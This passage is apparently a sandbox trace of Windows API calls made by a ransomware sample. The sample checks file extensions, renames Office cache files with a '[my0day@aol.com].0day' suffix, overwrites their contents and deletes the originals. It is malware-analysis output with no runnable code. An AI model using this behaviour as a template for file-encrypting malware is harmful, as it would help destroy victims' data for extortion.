lstrlenW (lpString=".xlsx") returned 5 [0044.915] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0044.915] lstrlenW (lpString=".ppt") returned 4 [0044.915] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.915] lstrlenW (lpString=".zip") returned 4 [0044.915] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.915] lstrlenW (lpString=".rar") returned 4 [0044.915] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.915] lstrlenW (lpString=".bz2") returned 4 [0044.915] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.915] lstrlenW (lpString=".7z") returned 3 [0044.915] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.915] lstrlenW (lpString=".dbf") returned 4 [0044.915] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.915] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString=".1cd") returned 4 [0044.916] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString=".jpg") returned 4 [0044.916] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString=".doc") returned 4 [0044.916] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString=".docx") returned 5 [0044.916] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0044.916] lstrlenW (lpString=".pdf") returned 4 [0044.916] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString=".xls") returned 4 [0044.916] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString=".xlsx") returned 5 [0044.916] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0044.916] lstrlenW (lpString=".ppt") returned 4 [0044.916] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString=".zip") returned 4 [0044.916] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString=".rar") returned 4 [0044.916] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.916] lstrlenW (lpString=".bz2") returned 4 [0044.916] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.916] lstrlenW (lpString=".7z") returned 3 [0044.916] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString=".dbf") returned 4 [0044.916] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.916] lstrlenW (lpString=".1cd") returned 4 [0044.916] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.916] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0044.917] lstrlenW (lpString=".jpg") returned 4 [0044.917] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.917] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0044.917] lstrlenW (lpString="ProPrWW.cab") returned 11 [0044.917] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.004] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=177720283) returned 1 [0045.004] CloseHandle (hObject=0x190) returned 1 [0045.004] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020 [0045.005] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.005] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0045.015] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.015] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.015] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.015] ReadFile (in: hFile=0x190, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.065] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.065] ReadFile (in: hFile=0x190, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.091] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.091] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.092] ReadFile (in: hFile=0x190, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.885] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.885] WriteFile (in: hFile=0x190, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0045.903] SetEndOfFile (hFile=0x190) returned 1 [0045.903] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3faa0a8 [0045.907] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.908] WriteFile (in: hFile=0x190, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.908] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.908] WriteFile (in: hFile=0x190, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.909] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.909] WriteFile (in: hFile=0x190, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.911] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3faa0a8 | out: hHeap=0x5f0000) returned 1 [0045.911] CloseHandle (hObject=0x190) returned 1 [0045.911] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0045.911] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.911] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString=".doc") returned 4 [0045.912] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString=".docx") returned 5 [0045.912] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0045.912] lstrlenW (lpString=".pdf") returned 4 [0045.912] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString=".xls") returned 4 [0045.912] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString=".xlsx") returned 5 [0045.912] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0045.912] lstrlenW (lpString=".ppt") returned 4 [0045.912] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString=".zip") returned 4 [0045.912] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString=".rar") returned 4 [0045.912] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString=".bz2") returned 4 [0045.912] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.912] lstrlenW (lpString=".7z") returned 3 [0045.912] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString=".dbf") returned 4 [0045.912] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString=".1cd") returned 4 [0045.912] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString=".jpg") returned 4 [0045.912] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.912] lstrlenW (lpString=".doc") returned 4 [0045.912] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString=".docx") returned 5 [0045.913] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0045.913] lstrlenW (lpString=".pdf") returned 4 [0045.913] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString=".xls") returned 4 [0045.913] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString=".xlsx") returned 5 [0045.913] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0045.913] lstrlenW (lpString=".ppt") returned 4 [0045.913] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.913] lstrlenW (lpString=".zip") returned 4 [0045.913] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString=".rar") returned 4 [0045.913] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString=".bz2") returned 4 [0045.913] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.913] lstrlenW (lpString=".7z") returned 3 [0045.913] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.913] lstrlenW (lpString=".dbf") returned 4 [0045.913] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.913] lstrlenW (lpString=".1cd") returned 4 [0045.913] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0045.913] lstrlenW (lpString=".jpg") returned 4 [0045.913] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.913] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0045.913] lstrlenW (lpString="PidGenX.dll") returned 11 [0045.914] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0047.641] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1463568) returned 1 [0047.641] CloseHandle (hObject=0x1d8) returned 1 [0047.641] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0047.641] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0047.641] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.641] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.641] GetLastError () returned 0x0 [0047.642] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0047.717] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0047.975] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x65520, lpOverlapped=0x0) returned 1 [0048.033] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0048.044] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.044] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.044] SetEndOfFile (hFile=0x16c) returned 1 [0048.044] CloseHandle (hObject=0x16c) returned 1 [0048.044] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.044] SetEndOfFile (hFile=0x1d8) returned 1 [0048.304] CloseHandle (hObject=0x1d8) returned 1 [0048.304] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.304] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0048.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.304] lstrlenW (lpString=".doc") returned 4 [0048.304] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.304] lstrlenW (lpString=".docx") returned 5 [0048.304] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0048.304] lstrlenW (lpString=".pdf") returned 4 [0048.304] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.304] lstrlenW (lpString=".xls") returned 4 [0048.304] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.304] lstrlenW (lpString=".xlsx") returned 5 [0048.304] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0048.304] lstrlenW (lpString=".ppt") returned 4 [0048.304] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.304] lstrlenW (lpString=".zip") returned 4 [0048.304] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.304] lstrlenW (lpString=".rar") returned 4 [0048.304] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString=".bz2") returned 4 [0048.305] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.305] lstrlenW (lpString=".7z") returned 3 [0048.305] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.305] lstrlenW (lpString=".dbf") returned 4 [0048.305] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.305] lstrlenW (lpString=".1cd") returned 4 [0048.305] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.305] lstrlenW (lpString=".jpg") returned 4 [0048.305] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.305] lstrlenW (lpString=".doc") returned 4 [0048.305] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString=".docx") returned 5 [0048.305] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0048.305] lstrlenW (lpString=".pdf") returned 4 [0048.305] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString=".xls") returned 4 [0048.305] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString=".xlsx") returned 5 [0048.305] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0048.305] lstrlenW (lpString=".ppt") returned 4 [0048.305] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.305] lstrlenW (lpString=".zip") returned 4 [0048.305] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString=".rar") returned 4 [0048.305] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.305] lstrlenW (lpString=".bz2") returned 4 [0048.305] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.305] lstrlenW (lpString=".7z") returned 3 [0048.305] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.306] lstrlenW (lpString=".dbf") returned 4 [0048.306] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.306] lstrlenW (lpString=".1cd") returned 4 [0048.306] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.306] lstrlenW (lpString=".jpg") returned 4 [0048.306] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.306] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0048.306] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0048.306] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0048.306] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=36233052) returned 1 [0048.306] CloseHandle (hObject=0x1d8) returned 1 [0048.306] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0048.306] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.306] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0048.530] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0048.530] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.531] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, 